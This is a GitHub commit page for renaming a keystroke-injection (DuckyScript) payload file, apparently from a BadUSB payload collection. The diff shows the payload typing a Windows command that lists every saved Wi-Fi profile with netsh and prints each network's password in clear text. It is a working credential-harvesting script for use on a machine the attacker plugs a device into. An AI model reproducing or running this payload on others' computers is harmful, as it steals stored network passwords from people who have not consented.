Rename Show_WiFi_Pass.txt to Show_WiFi_Passwords.txt

This commit is contained in:
UberGuidoZ 2022-07-10 00:29:31 -07:00 committed by GitHub
parent e61bd5779d
commit 281b7318d4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -11,4 +11,4 @@ ENTER
DELAY 250
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
DELAY 250
ENTER
ENTER